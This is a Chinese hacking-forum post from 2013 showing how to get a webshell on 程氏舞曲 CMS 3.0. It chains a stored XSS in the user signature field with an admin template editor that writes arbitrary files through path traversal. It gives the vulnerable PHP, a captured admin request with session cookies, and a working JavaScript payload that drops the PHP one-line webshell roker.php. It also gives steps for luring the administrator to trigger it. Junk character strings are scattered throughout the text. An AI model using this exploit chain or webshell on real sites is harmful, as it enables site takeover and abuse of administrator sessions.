找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2483|回复: 0
打印 上一主题 下一主题

程氏舞曲CMSPHP3.0 储存型xss getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-6 18:09:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
9 Z+ b- y+ L  c4 E" X官网已经修补了,所以重新下了源码: e* C+ q1 h7 C  c
因为 后台登入 还需要认证码 所以 注入就没看了。# r6 p; L- H  i
存在 xss  {3 F2 y  ?6 h& J2 x3 h
漏洞文件 user/member/skin_edit.php7 q( y5 t2 Y' z) a7 m
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
3 t& {! [) x7 @3 A* d# P  ! B4 _) u6 d! {$ ~% m$ b' d2 R
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
  q# \2 z/ H; _3 m3 y5 Q" h7 j  . O5 X/ |7 H$ d4 x7 w% u
</textarea></td></tr>7 L% }$ C: ~7 B3 f! m. z) n
  
0 C1 z! ]+ M4 N             user/do.php
8 [$ n7 r' o' f# D$ c2 a; C7 h9 i) K! U

. n' b7 G- S8 q% X9 d2 s3 Qif($op=='zl'){ //资料1 _6 Q# q. D, ^1 r& b; x, r. i
  
, i1 G2 Q" C6 b; y             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
4 l% i5 u7 _; X5 b1 i$ h. M             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
. z: g% d$ O! j% @( x4 g3 v  . u3 G6 V1 x% |6 y
             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
: g' j  E) L! i% g  ( o' F8 X/ r; e3 }8 x: K
             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
2 F$ l. |  R; z; ~3 q) X5 `; T             where CS_Name='".$cscms_name."'";
8 }/ k+ w7 U- ~7 S: K  
2 s0 @* Z4 P3 [; i             if($db->query($sql)){
8 }. o2 J5 {3 \% P  9 m  l; S  f3 R% I
              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));) w. x5 a6 P# ^$ G0 D& v
  
: C, B! _; d& X  w% w; f             }else{
) I& [3 e' Q2 v3 N1 s7 n  
2 B6 K) j) r% y              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));3 G* D4 p: Y% \* V
  
0 }. |2 N% w% ?( D             }
! U0 z3 y$ |3 Z$ u, P
9 ~5 @7 b/ c6 x! R, `
7 R  Y% O3 e9 q. b) B% C: e没有 过滤导致xss产生。
; C' c6 ?' G  O* f1 W  ^后台 看了下 很奇葩的是可以写任意格式文件。。( e4 V* C2 E; Y% C' |! z
抓包。。& o& m4 h0 x8 t1 C, {
6 C. o7 d1 l. X, S

, o& `+ f0 G, k; {( X) R9 @2 Y0 i本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
9 l! Z$ I0 }5 n- N. R$ i' G  
6 @; f! ?0 e- y4 ]  R6 Y8 z, wAccept: text/html, application/xhtml+xml, */*% z8 v2 n; Z, G1 M
  $ @- I: r6 t/ P  |" g
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php6 h& U" f- e) j# |+ @. ?
  - {/ f2 m: S. s8 n- s% q" d
Accept-Language: zh-CN1 |$ m! V4 o8 k$ F4 }* E$ E4 H
  ! Z2 o, b. B! y5 O# z
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
8 ^1 j2 s* Z6 l% ~& V+ ?  0 a& t" n. |8 C$ a
Content-Type: application/x-www-form-urlencoded; U8 ~  Q5 R5 A" [+ m, K
  
6 F6 _3 o8 D3 ]  L  G* C5 SAccept-Encoding: gzip, deflate) U- e* k( g  D6 B* y! D5 I3 y6 f- d
  ( e! ?5 f! [5 n" _( m3 p, G
Host: 127.0.0.1  w. q) i& s* }5 {/ ?$ B
  
6 D. _+ Q9 \) K8 I" V% s/ LContent-Length: 38) h$ }0 \4 j" t# X
  & b/ k  F1 \& [
DNT: 15 {/ S7 s3 H0 C3 w" A6 D- T
  / [0 t) W( U- F2 T* Z
Connection: Keep-Alive! ?; ?1 M: Z& R* R
  
4 u$ W5 h; z/ b- t( _" X) cCache-Control: no-cache) ]; |2 Z6 l! @$ e' v
  ( ?  V# ?1 ]3 a  I; B* B7 T
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594& N0 O$ U8 m0 a6 A9 W0 ]4 V
  
& A7 m! J  Z- t6 }3 G! r% [& O+ w' d/ ?6 [- r/ N/ [1 \
name=aaa.php&content=%3Cs%3E%3Ca%25%3E/ a  f8 z9 ^/ _7 v
7 Y3 f8 e' F2 F5 ~+ e+ ^

" A& k5 B$ i4 _( N. U: s# Y
" F* i1 s1 [0 F6 L于是 构造js如下。
* w+ m. f+ u* n! [2 X
0 _; ~, `4 f2 b7 q0 ~+ N% {本帖隐藏的内容<script>
7 o+ V: Q5 @7 @" V; j  \' ]  d- vthisTHost = top.location.hostname;+ l: Q' E: W2 Y  L
  / J( j. Y: N5 j8 `7 V5 S& z
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
6 s6 u; U7 [& Z% A9 ~  
% d8 Z# V+ b& R9 a/ afunction PostSubmit(url, data, msg) { / F; f* ~0 K0 E4 c0 l! h
    var postUrl = url;
  i6 o3 M6 H% s+ O  j2 M  3 b/ Y1 e6 f! _
    var postData = data;
/ W* S. T9 z* N  u4 Z9 Z- J    var msgData = msg;
% j2 ?- N0 S) h$ H1 d$ G9 d$ }( O    var ExportForm = document.createElement("FORM");
6 |/ H) _# b* M. f2 b4 W3 ?    document.body.appendChild(ExportForm);
5 V, {) X) ^% k7 T; v9 P    ExportForm.method = "POST"; 9 f$ V; S  @, s* A
    var newElement = document.createElement("input"); 3 l# A. N3 ]3 ~) v/ g! Z3 {( u
    newElement.setAttribute("name", "name");
. f& j; n3 \/ f' x" D0 a    newElement.setAttribute("type", "hidden"); : h  q9 @+ t3 a5 o) h* Z
    var newElement2 = document.createElement("input");
! e! F2 q: A4 _1 S' I: K& j+ R* x    newElement2.setAttribute("name", "content"); , y( b$ F% p  q
    newElement2.setAttribute("type", "hidden");
0 g6 `6 B) b" k    ExportForm.appendChild(newElement);
- ~% y0 t; r6 \0 q1 l0 `    ExportForm.appendChild(newElement2); $ Q& z" R* M; z9 d; \: v0 O+ ]
    newElement.value = postData;
1 B7 `5 v! T4 D  f5 Y    newElement2.value = msgData; ' P3 [' v# P1 J$ H6 B7 F
    ExportForm.action = postUrl; ! `! E& |! T! Z% Z) L7 w% X
    ExportForm.submit(); 1 j/ i) y, F1 q5 X; A4 j
};
  t1 I. ]& R+ h/ p* L/ N  : ^/ F0 C4 f4 T5 i8 g  Y0 I. i
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");' D( r7 I: I& }& Q/ F
  
7 j& x' e% f2 Z& S5 d; W</script>, x+ `2 G! q0 h9 S+ }

% I: O/ S7 E& n/ m. Y- p5 D  Y5 o
1 g/ Z; J& `* _/ r! }; r# N$ @
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入( G: o) _) I6 t1 `, u0 M. l; z
用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)
7 X8 |  w8 z9 j, o就会 在 skins\index\html\目录下生成 roker.php 一句话。
' P( x: P$ C9 C$ u4 D6 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表